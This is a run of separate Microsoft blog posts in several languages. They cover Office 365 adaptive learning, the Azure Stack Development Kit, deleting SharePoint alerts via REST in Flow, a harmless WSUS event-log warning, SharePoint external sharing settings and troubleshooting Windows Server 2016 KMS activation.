Автор статьи - Виталий Веденев.

Когда говорят о преимуществах дистанционного обучения, часто в их числе упоминают массовость. Рассматриваю, как организовать массовое обучение в Office 365.

Что вы будете знать и уметь после прочтения этой статьи?

- Как организовать дифференцированное, персонализированное и адаптивное обучение в Office 365?

Действительно, сложно сравнивать пропускную способность очного курса, пусть даже потокового, и массового онлайн-курса, практически не имеющего ограничений для масштабирования — разница в размере аудитории составит порядки. Но эта черта является также и недостатком дистанционного образования: в случае очной    формы проведения занятий педагог может подстраивать свои занятия под обучаемых, например, провести опрос в начале обучения, контролировать на занятиях уровень понимания учебного материала, общаться с отдельными студентами лично, если они что-то не усвоили или, наоборот, хотят больше углубиться в какие-то темы.

В случае массового онлайн-курса времени у педагога на подобное взаимодействие будет недостаточно, а обучаемые оказываются в строгих рамках линейно составленного курса без возможности подробнее разобрать сложные задания или пропустить простые.

Тем не менее, существуют способы реализовать что-то подобное и в автоматическом (массовом) режиме. Эти способы можно разделить на три основные группы:

1. Дифференцированное обучение. Педагог заранее создаёт несколько фиксированных учебных траекторий разного уровня сложности.
2. Персонализированное обучение. В этом случае учебная траектория строится в ходе процесса обучения в зависимости от результатов обучаемого в промежуточных контрольных заданиях.
3. Адаптивное обучение. Самая интересная с точки зрения алгоритмов группа. Траектория также строится в процессе обучения, но не требует начальной разметки от преподавателя, а использует максимум информации о том, как студент изучает материал и как этот материал изучали до него.

Далее в статье рассмотрены конкретные примеры реализации трех основных групп организации обучения в Office 365.

Сценарий 1. Пример организации дифференцированного обучения в Office 365

Организовать дифференцированное обучение возможно любым из известных способов организации информационно-образовательной среды (ИОС) [1-3], и выбор ИОС зависит от предпочтений педагогического сообщества учебного заведения.

Самый простой способ подстроить материал под уровень знаний обучаемого: педагог заранее создаёт несколько фиксированных учебных траекторий разного уровня сложности, а обучаемый выбирает для себя подходящую и далее обучается по ней в обычном, линейном режиме.

Например, это может быть серия учебников Sway [4-5] или модулей в OneDrive [6] для разного уровня знания материала, и в качестве ИОС мы выбрали частную социальную сеть Yammer:

Пояснения к схеме:

1. Предварительно педагог в Sway [5] создает электронный учебник, включающий тесты, видео, задания и дополнительные материалы модуля. Затем путем копирования создает необходимое количество дублированных учебников и в соответствии с уровнем обучения добавляет или убавляет необходимое количество учебного материала. Далее он копирует ссылки на учебники разных уровней знаний для использования в опросе с ветвлением.
2. Педагог создает опрос с ветвлением [7], который помогает обучаемому определиться с уровнем знаний и выбором учебника Sway.
3. В группе внешней частной социальной сети размещается пояснение к опросу с ветвлением. Это может сделать кто-то из участников группы [3].

Сценарий 2. Пример организации персонализированного обучения в Office 365

В случае персонализированного обучения траектория строится в процессе обучения в зависимости от результатов обучаемого, например, в промежуточных тестированиях. Правила о том, в какой момент проводить тестирование и что советовать изучать дальше при разных результатах, заранее задаёт педагог.

Персонализированное обучение может сочетаться с групповым, но траекторию обучения в обоих случаях задает педагог. Для реализации персонализированного обучения может использоваться опрос с ветвлением [7], включающий ссылки на промежуточное тестирование и с переходом к изучению следующего блока информации по итогам тестирования. Для этого педагогу надо продумать более сложный алгоритм создания опроса с ветвлением в Microsoft Forms (см. сценарий 1 [7] и видео «Создание опросов с ветвлением в Microsoft Forms»).

Персонализированное обучение может быть создано посредством использования возможности создания педагогом персонализированных заданий в Microsoft Teams [8,9]. Использование персонального раздела в записной книжке OneNote Online для занятий [9] расширяет возможности педагога по персонализации обучения.

Пояснения к схеме:

1. Если в качестве ИОС выбран Microsoft Teams [1], то можно использовать возможность формирования заданий в записной книжке OneNote Online.
2. В задании должна быть предусмотрена возможность тестирования обучаемого в зависимости от предыдущих результатов на базе Microsoft Forms.

Сценарий 3. Пример организации адаптивного обучения в Office 365

Индивидуальная траектория также строится в процессе обучения, но не требует начальной разметки от педагога, а использует максимум информации о том, как обучаемый изучает материал и как этот материал изучали до него.

Адаптивное обучение в Office 365 можно сделать в виде рекомендательной системы (можно задействовать возможности чат-бота Microsoft Teams [10]), которая советует пользователю, какой раздел материала ему стоит изучить следующим, в зависимости от его предыдущих действий.

Получив рекомендованный к обучению материал, пользователь может выбрать дальнейшие шаги:

- пройти учебный материал (решить задачи в нём) и в итоге получить дальнейшие рекомендации,

- пометить материал как слишком простой и перейти к более сложному материалу для изучения

- пометить материал как слишком сложный и продолжить изучение рекомендаций

Использованные источники:

1. Microsoft Office 365 в образовании. Построение информационно-образовательной среды средствами Microsoft Teams и сайтов SharePoint https://blogs.technet.microsoft.com/tasush/2018/01/11/postroenie-informacionno-obrazovatelnoj-sredy-sredstvami-microsoft-teams-i-sajtov-sharepoint/
2. Microsoft Office 365 в образовании. Построение информационно-образовательной среды средствами Microsoft Teams и потокового видео Microsoft https://blogs.technet.microsoft.com/tasush/2018/01/19/postroenie-informacionno-obrazovatelnoj-sredy-sredstvami-microsoft-teams-i-potokovogo-video-microsoft-stream/
3. Microsoft Office 365 в образовании. Построение информационно-образовательной среды средствами частной социальной сети Yammer https://blogs.technet.microsoft.com/tasush/2018/02/22/postroenie-informacionno-obrazovatelnoj-sredy-sredstvami-chastnoj-socialnoj-seti-yammer/
4. Microsoft Office 365 в образовании. Содержание образовательных программ и Microsoft Sway https://vedenev.livejournal.com/19936.html
5. Microsoft Office 365 в образовании. Организуем обучение с помощью Microsoft Sway https://blogs.technet.microsoft.com/tasush/2017/02/28/organizuem-obuchenie-s-pomoshhju-microsoft-sway/
6. Microsoft Office 365 в образовании. Примеры реализации образовательных программ https://blogs.technet.microsoft.com/tasush/2017/06/16/primery-realizacii-obrazovatelnyh-programm/
7. Microsoft Office 365 в образовании. Создание обучающих опросов с ветвлением в Microsoft Forms https://blogs.technet.microsoft.com/tasush/2017/02/03/sozdanie-obuchajushhih-oprosov-s-vetvleniem-v-microsoft-forms/
8. Microsoft Office 365 в образовании. Организация обучения, основанного на заданиях в Microsoft Teams с нововведениями. Часть 1 https://blogs.technet.microsoft.com/tasush/2017/12/13/organizacija-obuchenija-osnovannogo-na-zadanijah-v-microsoft-teams-s-novovvedenijami-1/
9. Microsoft Office 365 в образовании. Организация обучения, основанного на заданиях в Microsoft Teams с нововведениями. Часть 2 https://blogs.technet.microsoft.com/tasush/2017/12/22/organizacija-obuchenija-osnovannogo-na-zadanijah-v-microsoft-teams-s-novovvedenijami-2/

• Microsoft Office 365 в образовании. Современное обучение и Microsoft Teams. Новые тенденции https://vedenev.livejournal.com/25012.html

You may well have heard that there is a way of running Microsoft's Azure public cloud service in your own datacenter. You may have paid it lip service and not believed such propaganda.

Well - folk It is here it works and it provides an opportunity to do so much more with your own hardware on site and provide a number of Azure services to your own employees and customers.

This post is aimed at explaining what Azure Stack is, what it does and how you can go about learning how to use it.

What Azure Stack is

First the facts. Microsoft Azure Stack, according to the Azure Stack Operator Documentation is

"Microsoft Azure Stack is a hybrid cloud platform that lets you provide Azure services from your datacenter. "

Now as you probably know Microsoft Azure now has over 50 regions made up of 100's of datacenter buildings spread across the face of the globe. There are millions of compute cores providing services as diverse as Traffic Manager, Content Delivery Networks, Machine Learning, HDInsight, SQL Data Warehouse and many more. There is no way that a normal or even a large datacenter can house all these services for you and Azure Stack is not designed to do so. Azure Stack will provide a growing sub set of the Azure services for use in a hybrid (connected) or even a disconnected scenario.

Azure Stack is available now in two deployments. There is the Azure Stack licensed for use in production. This is provided as the Azure Stack Integrated System. 

The integrated system is available through a small number of  hardware partners, (currently just four Cisco, Dell EMC, HPE and, Lenovo). This allows the hardware vendors to offer a combined system of hardware and software to provide just the flexibility and control you need over your system. The integrated system is available in configurations for 4 nodes to 12 nodes. Support is provided jointly through the hardware partner and Microsoft. This is intended for the deployment of production workloads in a new and innovative manner.

Licensing the Azure Stack integrated system is dependent upon the method you use to deploy and can be varied in several ways from Pay as you go (just like Azure) to a consumption model for the disconnected scenario. A later post will cover these in detail.

The alternative to the integrated system is the Azure Stack Development Kit (ASDK). ASDK can only be deployed on a single node and is intended to allow you to evaluate and learn all about the platform and its services. ASDK can be provided  within your organization as a developer platform completely consistent with the Azure APIs and tooling. ASDK is not licensed for production workloads. For this reason it comes with the following limitations.

• ASDK is associated with a single Azure Active Directory (Azure AD) or Active Directory Federation Services (AD FS) identity provider. You can create multiple users in this directory and assign subscriptions to each user.
• With all components deployed on the single machine, there are limited physical resources available for tenant resources. This configuration is not intended for scale or performance evaluation.
• Networking scenarios are limited due to the single host/NIC requirement.

Indeed to make sure it is of no practical use in production the ASDK will disable all except for one NIC on the host machine during install.

The host machine for the ASDK requires the following specification.

The many and complex PowerShell scripts used to install the ASDK check for all of these and will  not allow installation unless you amend those script tests. To be brutally honest doing so is counter-productive since these hardware specs are definitely the minimum to run the ASDK effectively.

Deploying the ASDK

This is not a trivial enterprise! I have installed ASDK several times (it will only work for 180 days each time you install it). The exercise took me between 7 and 10 hours each time. It is however not a complex job. (If you know PowerShell)

First you download the Development Kit package. You need to register first. Having downloaded and extracted the files, you need to copy the cloudbuilder.vhdx file to the host machine.

Set the host to boot from this VHD and you are good to go. There is now a GUI installer or the PowerShell option. At this point you can choose to use Azure AD or AFDS to provide the identity solution for your deployment. I use Azure AD. Once you have run the InstallAzureStackPOC.ps1 PowerShell script and waited the requisite time. You will be left with a Hyper-V server joined to a domain with the following Virtual Machines (VMs) which form the infrastructure of your Azure Stack Dev Kit. The below diagram shows the logical architecture of the ASDK.

The VMs are listed in the table below with their function.

Notice there are VMs for Software Load-balancing and Network Controller, services which appear in Windows Server 2016 but originated as Azure services and are used to manage the full Azure public cloud.

Interesting note: Any VMs you create in Azure Stack will appear in the Hyper-v host, as shown below

Here you can see the VMs alongside two additional VMs with long GUID names one is a Windows Server VM with 28 GB RAM and the other is an Ubuntu VM (cos I love Linux too) with 56 GB RAM.

What azure stack does.

Azure Stack provides a subset of Azure services. There are foundational services which are deployed when you deploy your ASDK, these are;

Compute

Storage

Networking

Key Vault

There are also additional Platform-as-a-service (PaaS) services which can be configured and installed by an ASDK administrator.

App Service

Azure Functions

SQL and MySQL databases

Azure Stack will keep on adding services to this list. The Azure Stack Roadmap is here

Learning How to use Azure Stack

Nowadays this section is always very short and very easy, even if the learning is not.

Pluralsight are offering free training for Azure Stack.

Microsoft Virtual Academy has some Azure Stack content

Channel9 has some great content here

Finally the docs.microsoft.com site has all of the Azure Stack documentation in.

BUT the very best way to learn is to dive in and understand the differences between Azure and Azure stack operation by deploying it yourself. it can even be deployed on an Azure VM is you like!

The Concept of an administrator portal doesn't really exist in Azure, but in Azure stack you have both an Admin portal and an operator portal as shown below.

The administrator portal allows you to create your very own marketplace as shown in the first graphic of the post. It also allows the administrator to create plans of resources to then offer out to users who can then create or accept subscriptions based on those offers.

Once a user has a subscription he can then deploy resources in exactly the same fashion and methods as Azure. The portal, the PowerShell and the resource manager templates.

You can see above the Ubuntu VM I showed in the Hyper-v manager graphic.

I have to thank Lenovo UK for the loan of the hardware to deploy my ASDK, it is a Lenovo 9650 with 20 cores and 265GB RAM.

More in the next post on Azure Stack, dive in and enjoy.

Scenario: SharePoint Administrators would love to delete User alerts subscribed to a list/library in one go. But unfortunately there is no way in User Interface that is allowed, you have to do it one by one for every user which is not efficient and very time consuming.

In my Previous blog "Get list of Users Subscribed to OOB Alerts", you can get all Alerts which is also not possible via User Interface.

In this blog I will show how to Delete Alerts for a specific List and the task can be achieved in few seconds.

Solution:
Below is how the Overall uncollapsed version of the Flow looks like. I will break it up further.

1. First we need to connect to the site. so HTTP REST API call to get the Alerts .

Compose data operation "Access Token' enter ' "@outputs('HTTP').body.access_token" ' (with double quotes which is in Bold

Compose data operation "Compose" enter ' "@outputs('HTTP_2').body.d.results"  ' (with double quotes which is in Bold

4. Next we are checking for a specific List from which we want to delete all the OOB Alerts. Add a Condition where 'Output of ListTitle' is equal to the List.

5. Last step of Alert deletion. If condition is met, we run another HTTP REST API method "DELETE". The syntax for delete is " /_api/web/alerts/deletealert('Alert ID') " . So we need to replace the 'Alert ID' with the output of the compose action where Alert ID of the current item is stored. ( Pls. Note: REST API Method call will be "DELETE" )

On a Successful Deletion once the Condition of List Title is met, HTTP Call for Delete Method will look like below.

Digitalt understøttet undervisning aktiverer elever på helt nye måder.

Det kan hjælpe med differentiering af undervisningen, til gavn for både fagligt svagt og fagligt stærkt stillede elever. Helt lavpraktisk kan det hjælpe underviseren i hverdagen med planlægning og dokumentation af denne. Så hvorfor ikke begynde din rejse mod et mere digitalt klasseværelse allerede i dag? 

Vi er klar til at hjælpe dig i gang!

I samarbejde med super seje undervisere fra hele landet har vi udviklet en webside, hvor alt om det moderne klasseværelse er samlet. En oversigt over de mest brugte værktøjer til digital undervisning. Hvis du oven i købet logger ind (sign in) når du gennemgår materialerne vil du løbende kunne opbygge point mod din rejse som Microsoft Innovative Educator (MIE) - det er godt for cv'et!

Du vil finde gratis kurser i Microsoft Office produkter som OneNote, Sway og Teams - og inspirationsmaterialer om følgende områder:

• Mediepatruljer til udrulning af digitale værktøjer
• Minecraft i matematikundervisningen
• Sway til flotte, nemme elevpræsentationer - Multimodalitet
• OneNote som klassens digitale ringbind
• Gode råd til at hjælpe lærere i gang med nye værktøjer
• Værktøjer til elever med læsevanskeligheder

Find det hele på www.aka.ms/blivMIE - brug koden ECQV6X9MCTAFY2018 når du tilmelder dig - så er du et skridt på vejen mod at blive en Microsoft Innovative Educator!

(Siden kan nemmest tilgås via Mac/PC - ved mobiladgang kræves login som fx Facebook, Office365 arbejdskonto el lign.)

Kontakt Erik Carter hos Microsoft hvis du har spørgsmål: a-ercart@microsoft.com

GRATIS WORKSHOPS

Bor du i Lyngby og omegn på Sjælland,  så anbefaler vi at du melder dig til en eller flere gratis eftermiddags workshops, hvor Erik gennemgår programmernes funktioner til understøttende læring - et program ad gangen.

Se workshop oversigten her

Sceanrio: Get the list of Users subscribed for Out of the box SharePoint Online Alerts per site/subsite.

It has been a long waited requirement from SharePoint users and Admin globally and an ask to Microsoft to provide a way to get a list of all users who have subscribed alerts on lists/libraries or any object in a SharePoint Site or a subsite. After what feels like a lifetime, Microsoft released Rest API methods for SharePoint Alerts and very recently I had to use them to Get and Delete user alerts using REST API call for a project.

Today, I will be showing How to Get the list of All Users subscribed to alerts for a Site or a Subsite and next blog will be to How to Delete alerts for a specific List or a Library using REST API method in Microsoft Flow.

Solution:

1. You need to get Access Token for the SharePoint site. I have listed to very commonly browsed articles for same in this Article. Same steps in My MS Flow looks like below.

2. Initialize the Variable. The Output generated from REST API is in Array form. so we need to get only the Results body from "/_api/web/alerts?$expand=user" and store it in a Global Array variable. 

3. Now it gets a bit tricky. I am retrieving only "User Email", "User Display Name" (which comes as Title in REST API results and the "List Title" to which the alert is subscribed to.

This is Uncollapsed screenshot, below I will break it up for better understanding.

Here, from the Original Array results of HTTP REST API call, we will store the values in variables.

In "Create HTML Table" I had kept "Include Headers" as "No", but there is a bug I reported to Microsoft HERE.

Final Step is sending mail to yourself with the output of the HTML table created. 

みなさま、こんにちは。WSUS サポート チームです。

Windows Server 2016 の環境にて、更新プログラム削除時に、Windows Update Client に関する以下のエラーがイベント ログに出力される事象について紹介いたします。

< 対象イベント ログ >

ソース: ESENT
イベントID: 640
レベル: 警告
ユーザー: N/A
メッセージ：
wuaueng.dll (960) SUS20ClientDataStore: フラッシュ マップ ファイル "C:WindowsSoftwareDistributionDataStoreDataStore.jfm" でのヘッダー ページの検証中にエラー -1919 が発生しました。フラッシュ マップ ファイルは無効になります。
詳細については、[SignDbHdrFromDb:Create time:00/00/1900 00:00:00.000 Rand:0 Computer:] [SignFmHdrFromDb:Create time:00/00/1900 00:00:00.000 Rand:0 Computer:] [SignDbHdrFromFm:Create time:03/16/2018 14:57:54.165 Rand:2602757889 Computer:] [SignFmHdrFromFm:Create time:03/16/2018 14:57:54.212 Rand:1467011330 Computer:] を参照してください

ソース: ESENT
イベントID: 636
レベル: 警告
ユーザー: N/A
メッセージ：
wuaueng.dll (960) SUS20ClientDataStore: フラッシュ マップ ファイル "C:WindowsSoftwareDistributionDataStoreDataStore.jfm" は削除されます。理由: ReadHdrFailed。

結論から申し上げると上記の記録は、異常を指し示すものではございません。詳細について以下にご案内していきます。

事象の詳細

Windows Update Client が起動する際には、常に以下のデータベースのバージョンを確認いたします。

C:WindowsSoftwareDistributionDataStoreDataStore.edb

その際に、データベースのバージョンと、想定されるバージョンが異なる場合に、必ずデータベースの再作成を行います。再作成の結果として、今回のエラーが発生いたします。
更新プログラムのアンインストール時等のシステム変更に伴い、Windows Update Client とデータベースのバージョンに差異が発生することを考慮して実装されている状況ではないため、当該警告メッセージが出力される状況となりますが、頻発しない場合には問題ないとご判断ください。

対処方法

残念ながら現時点では問題に対する修正が行われておりませんが、このイベントが出力されることによって影響が発生することは想定されず、対処を実施していただく必要はありません。
恐れ入りますが、イベント ログの監視等を行われている場合には、当該警告イベントを除外していただけますようお願いいたします。

General Availability of Azure Database for PostgreSQL

As announced on the 20th March, Azure Database for PostgreSQL and Azure Database for MySQL are generally available with an uptime SLA of 99.99 percent.

What does this mean?

These services bring the community versions of MySQL and PostgreSQL database engines together with:

• Built-in high availability
• Elastic scaling for performance
• Industry leading security and compliance

Azure database services for MySQL and PostgreSQL enable flexibility for applications, from the choice of framework and language, to a rich ecosystem of tools and services - making it easier and quicker to build intelligent apps.

Check out the full details here.

General Availability of Azure Databricks

On the 22nd March, we also announced the general availability of Azure Databricks - a fast, easy, and collaborative Apache Spark based analytics platform optimised for Azure.

Designed in collaboration with the founders of Apache Spark, Azure Databricks combines the best of Databricks and Azure to help customers:

• Accelerate innovation with one-click set up
• Streamline workflows and an interactive workspace that enables collaboration between data scientists, data engineers, and business analysts.

As an Azure service, customers automatically benefit from native integration with other Azure services such as PowerBI, SQL Data Warehouse, Cosmos DB as well as from enterprise-grade Azure security, including Active Directory integration, compliance, and enterprise-grade SLAs.

Missed the official announcement? Catch up here.

Azure Stack がGAしてからの数か月、様々なパートナー様とAzure Stackセミナーを実施させていただきました。

週２、週３でセッションをこなしていると、エバンジェリストに戻ったような感覚でしたが、もう1つの本業は減らないので両方頑張ってます。

さて、これまでのセミナーでは、マイクロソフトがパブリッククラウドAzure にどれだけ真剣に取り組んでいるか、そして、様々な要件や制約を無理やり乗り越えようとするのではなくAzureの配置場所を柔軟にするAzure Stackによって本来注力すべきことに目を向けてほしいといったお話をしました。

セミナーのコンセプトに合わせて内容やトーンは変えましたが、基本的には、何度も何度もAzure Stackとは？を繰り返しお伝えしてきました。

ただ、今回 IIJさん、HPEさんとAzure Stackセミナーをすることになり、内容についての議論も行った結果、そろそろ変えたくなりました。

もちろん、まだまだ概要をお話しする機会はあると思いますし、コンセプトを語るのに飽きたわけではありません。

でも、新しい期が見えてきている今こそ、知らない人向けに話をするセミナーばかりでなく、「Azure Stackの概要くらいは知ってるよ」という方に一歩踏み出してもらうような情報提供をしたいと思ったわけです。

限られた時間の中で、Azure Stack の IaaSとPaaS、そしてAzure Stackロードマップの説明と共に Service Fabric や Container Service、そこに紐づくIoT Edge や Edgeで動く Machine Learning の話など、2～3時間もらって個社向けに話をしたときくらいの話をギュッと凝縮してお届けする予定です。

まずは 3月30日(金) 大阪
【大阪】こう使う！Microsoft Azure Stackセミナー実践編　～HCIで解決できないクラウドの使い方

その次は4月17日(火) 福岡
【福岡】こう使う！Microsoft Azure Stackセミナー実践編　～HCIで解決できないクラウドの使い方～

正直な話をすると、今コンテンツを作っているのですが、スライドの枚数が増え続けています(笑)

Azure Stack って、伝えたいことが山ほどあるんです。

だからこそ楽しいんです。

コンセプト系のセミナーを第一弾とすると、今回のセミナーは第二弾で、おそらく第三弾、第四弾とやっていく必要はあると思います。

でも、第三弾の前に、まずは一歩踏み出すための第二弾のセミナーに是非ともお越しください。

そして、セッションを聞くだけでなく、休憩時間やセミナーの前後に、ぜひともいろんなお話でも質問でも私に投げつけてください！

それこそ現地に来ていただくメリットだと思っています。

まずは今週金曜日、マイクロソフトの関西支店でお待ちしております。

マイクロソフト 高添

Hi this is the 4th of 4 blogs on SharePoint Online External Sharing of sites.

Here is a mini table of contents

• Scenario 1: Don't Allow Sharing Outside You Organization
• Scenario 2: Allow sharing only with the external users that already exist in your organization's directory
• Scenario 3: Allow users to invite and share with authenticated external users
• Scenario 4: Allow sharing to authenticated external users and using anonymous access links
• External Sharing Matrix

The settings in the screenshot below are accessible via a Global admin OR a SharePoint Admin (meaning someone who has been granted access to the SharePoint Admin center BY a Global Admin). The location is as follows: O365 Portal>>SharePoint admin>>Sharing

This is an External Sharing Matrix created by my colleague and fellow PFE Kevin Kirkpatrick. Check out his blog here.

In this blog we will be discussing the highlighted portion of the matrix below.

Once you choose an option other than 'Don't allow sharing outside your organization' you will receive the following screen  as a reminder of the fact that SharePoint Site collections also have individual sharing settings that you can set. These SharePoint site collection settings RESPECT the settings of the SharePoint Admin Center. You would click OK to proceed knowing that any site collections that previously had sharing settings enabled will be re-activated since you are activating it at the SharePoint Admin center level.

I make sure that the site collection sharing settings are also set to the same level of sharing, in this case 'Allow external users who accept sharing invitations and sign-in as authenticated users' (see previous blog for a thorough explanation of these settings)

The Site Owner is allowed to invite an external user. Now if they user is already in Azure AD then the site owner may see a result listed as below. If not, they user will not be found but that is fine. Proceed to send the invite anyway. We require the user to accept the sharing invite to be added to Azure AD if they are not. Then we add them to the O365 portal as well.

The external user will now get an invite in their email like this

After clicking on the link from the invite to the site, in this example the 'TeamSite' link, the external user will be taken to this screen. They should choose 'Organizational Account'.

One small hurdle that may happen is that after clicking on the 'Organizational Account' the external user may receive a 'You need permission to access this site'. They can then click the 'Request Access' link which will notify the owner of the to specifically approve this request

The owner of the site can then approve the access request (Site collection >> Access requests and invitations) via the screen below. Once that is complete the External user will have access to the site.

Hi this is the 3rd of 4 blogs on SharePoint Online External Sharing of sites.

Here is a mini table of contents

• Scenario 1: Don't Allow Sharing Outside You Organization
• Scenario 2: Allow sharing only with the external users that already exist in your organization's directory
• Scenario 3: Allow users to invite and share with authenticated external users
• Scenario 4: Allow sharing to authenticated external users and using anonymous access links
• External Sharing Matrix

The settings in the screenshot below are accessible via a Global admin OR a SharePoint Admin (meaning someone who has been granted access to the SharePoint Admin center BY a Global Admin). The location is as follows: O365 Portal>>SharePoint admin>>Sharing

Once you choose an option other than 'Don't allow sharing outside your organization' you will receive the following screen  as a reminder of the fact that SharePoint Site collections also have individual sharing settings that you can set. These SharePoint site collection settings RESPECT the settings of the SharePoint Admin Center. You would click OK to proceed knowing that any site collections that previously had sharing settings enabled will be re-activated since you are activating it at the SharePoint Admin center level.

I make sure that the site collection sharing settings are also set to the same level of sharing, in this case 'Allow external users who accept sharing invitations and sign-in as authenticated users' (see previous blog for a thorough explanation of these settings)

The Site Owner is allowed to invite an external user. Now if they user is already in Azure AD then the site owner may see a result listed as below. If not, they user will not be found but that is fine. Proceed to send the invite anyway. We require the user to accept the sharing invite to be added to Azure AD if they are not. Then we add them to the O365 portal as well.

The external user will now get an invite in their email like this

After clicking on the link from the invite to the site, in this example the 'TeamSite' link, the external user will be taken to this screen. They should choose 'Organizational Account'.

One small hurdle that may happen is that after clicking on the 'Organizational Account' the external user may receive a 'You need permission to access this site'. They can then click the 'Request Access' link which will notify the owner of the to specifically approve this request

The owner of the site can then approve the access request (Site collection >> Access requests and invitations) via the screen below. Once that is complete the External user will have access to the site.

Hello everyone! My name is Mike Kammer, and I have been a Platforms PFE with Microsoft for just over two years now. I recently helped a customer with deploying Windows Server 2016 in their environment. We took this opportunity to also migrate their activation methodology from a KMS Server to Active Directory Based Activation.

As proper procedure for making all changes, we started our migration in the customer's test environment. We began our deployment by following the instructions in this excellent blog post by Charity Shelbourne. The domain controllers in our test environment were all running Windows Server 2012 R2, so we did not need to prep our forest. We installed the role on a Windows Server 2012 R2 Domain Controller and chose Active Directory Based Activation as our Volume Activation Method. We installed our KMS key and gave it a name of KMS AD Activation ( ** LAB). We pretty much followed the blog post step by step.

We started by building four virtual machines, two Windows 2016 Standard and two Windows 2016 Datacenter. At this point everything was great, and everyone was happy. We built a physical server running Windows 2016 Standard, and the machine activated properly. And that's where our story ends.

Ha Ha! Just kidding! Nothing is ever that easy. Truthfully, the set up and configuration were super easy, so that part was simple and straight forward. I came back into the office on Monday, and all the virtual machines I had built the week prior showed that they weren't activated. Hey! That's not right! I went back to the physical machine and it was fine. I went to the customer to discuss what had happened. Of course, the first question was "What changed over the weekend?" And as usual the answer was "nothing." This time, nothing really had been changed, and we had to figure out what was going on.

I went to one of my problem servers, opened a command prompt, and checked my output from the SLMGR /AO-LIST command. The AO-LIST switch displays all activation objects in Active Directory.

The results show that we have two Activation Objects: one for Server 2012 R2, and our newly created KMS AD Activation (** LAB) which is our Windows Server 2016 license. This confirms our Active Directory is correctly configured to activate Windows KMS Clients

Knowing that the SLMGR command is my friend for license activation, I continued with different options. I tried the /DLV switch, which will display detailed license information. This looked fine to me, I was running the Standard version of Windows Server 2016, there's an Activation ID, an Installation ID, a validation URL, even a partial Product Key.

Does anyone see what I missed at this point? We'll come back to it after my other troubleshooting steps but suffice it to say the answer is in this screenshot.

My thinking now is that for some reason the key is borked, so I use the /UPK switch, which uninstalls the current key. While this was effective in removing the key, it is generally not the best way to do it. Should the server get rebooted before getting a new key it may leave the server in a bad state. I found that using the /IPK switch (which I do later in my troubleshooting) overwrites the existing key and is a much safer route to take. Learn from my missteps!

I ran the /DLV switch again, to see the detailed license information. Unfortunately for me that didn't give me any helpful information, just a product key not found error. Because, of course, there's no key since I just uninstalled it!

I figured it was a longshot, but I tried the /ATO switch, which should activate Windows against the known KMS servers (or Active Directory as the case may be). Again, just a product not found error.

My next thought was that sometimes stopping and starting a service does the trick, so I tried that next. I need to stop and start the SPPSVC service, which is the Microsoft Software Protection Platform Service. From an administrative command prompt, I use the trusty NET STOP and NET START commands. I notice at first that the service isn't running, so I think this must be it!

But no. After starting the service and attempting to activate Windows again, I still get the product not found error.

I then looked at the Application Event Log on one of the trouble servers. I find an error related to License Activation, Event ID 8198, with a code of 0x8007007B.

While looking up this code, I found this article which says my error code means the file name, directory name, or volume label syntax is incorrect. Reading through the methods described in the article, it didn't seem that any of them fit my situation. When I ran the NSLOOKUP -type=all _vlmcs._tcp command, I found the existing KMS server (still lots of Windows 7 and Server 2008 machines in the environment, so it was necessary to keep it around), but also the five domain controllers as well. This indicated that it was not a DNS problem and my issues were elsewhere.

So I know DNS is fine. Active Directory is properly configured as a KMS activation source. My physical server has been activated properly. Could this be an issue with just VMs? As an interesting side note at this point, my customer informs me that someone in a different department has decided to build more than a dozen virtual Windows Server 2016 machines as well. So now I assume I've got another dozen servers to deal with that won't be activating. But no! Those servers activated just fine.

Well, I headed back to my SLMGR command to figure out how to get these monsters activated. This time I'm going to use the /IPK switch, which will allow me to install a product key. I went to this site to get the appropriate keys for my Standard version of Windows Server 2016. Some of my servers are Datacenter, but I need to fix this one first.

I used the /IPK switch to install a product key, choosing the Windows Server 2016 Standard key

From here on out I only captured results from my Datacenter experiences, but they were the same. I used the /ATO switch to force the activation. We get the awesome message that the product has been activated successfully!

Using the /DLV switch again we can see that now we have been activated by Active Directory.

Now, what had gone wrong? Why did I have to remove the installed key and add those generic keys to get these machines to activate properly? Why did the other dozen or so machines activate with no issues? As I said earlier, I missed something key in the initial stages of looking at the issue. I was thoroughly confused, so reached out to Charity from the initial blog post to see if she could help me. She saw the problem right away and helped me understand what I had missed early on.

When I ran the first /DLV switch, in the description was the key. The description was Windows® Operating System, RETAIL Channel. I had looked at that and thought that RETAIL Channel meant that it had been purchased and was a valid key.

When we look at the output of the /DLV switch from a properly activated server, notice the description now states VOLUME_KMSCLIENT channel. This lets us know that it is indeed a volume license.

So what does that RETAIL channel mean then? Well, it means the media that was used to install the operating system was an MSDN ISO. I went back to my customer and asked if, by some chance, there was a second Windows Server 2016 ISO floating around the network. Turns out that yes, there was another ISO on the network, and it had been used to create the other dozen machines. They compared the two ISOs and sure enough the one that was given to me to build the virtual servers was, in fact, an MSDN ISO. They removed that MSDN ISO from their network and now we have all our existing servers activated and no more worries about the activation failing on future builds.

I hope this has been helpful and may save you some time going forward!

Mike

Hi this is the 2nd of 4 blogs on SharePoint Online External Sharing of sites.

Here is a mini table of contents

• Scenario 1: Don't Allow Sharing Outside You Organization
• Scenario 2: Allow sharing only with the external users that already exist in your organization's directory
• Scenario 3: Allow users to invite and share with authenticated external users
• Scenario 4: Allow sharing to authenticated external users and using anonymous access links
• External Sharing Matrix

The settings in the screenshot below are accessible via a Global admin OR a SharePoint Admin (meaning someone who has been granted access to the SharePoint Admin center BY a Global Admin). The location is as follows: O365 Portal>>SharePoint admin>>Sharing

Once this option is selected this next screen pops up as a reminder of the fact that SharePoint Site collections also have individual sharing settings that you can set. These SharePoint site collection settings RESPECT the settings of the SharePoint Admin Center. So, this is a reminder and you would click OK to proceed knowing that any site collections that previously had sharing settings enabled will be re-activated since you are activating it at the SharePoint Admin center level.

Now, I'd like to talk a bit about these SharePoint Site collection specific sharing settings because if you don't set them inline with your SharePoint admin settings, you could waste a lot of time trying to figure out why your settings in the Admin center are not taking effect.  These Site collection settings are also set at the SharePoint Admin center but they are located here: O365 Portal>>SharePoint Admin>>Site Collections. Then you would click on a specific site collection and click on the 'Sharing' icon.

This then brings up an additional set of Sharing settings that look exactly like the SharePoint admin settings except they apply specifically to a site collection.

NOTE: Now here is where it can get confusing. If your SharePoint Admin center is set to anything other than 'Don't allow sharing outside your organization' BUT your Site Collection is set to the setting you see above, when you go to share the site collection, you will experience the Scenario 1 in my previous blog. You will NOT be able to share it. I wasted a lot of time one late night trying to figure out why I could not share a site because I had set my SharePoint Admin settings to 'Allow sharing only with the external users that already exist in your organizations' directory', then I discovered my site collection specific sharing settings was set to a lower setting. Those lower settings of the site collection ARE RESPECTED over the SharePoint Admin settings.

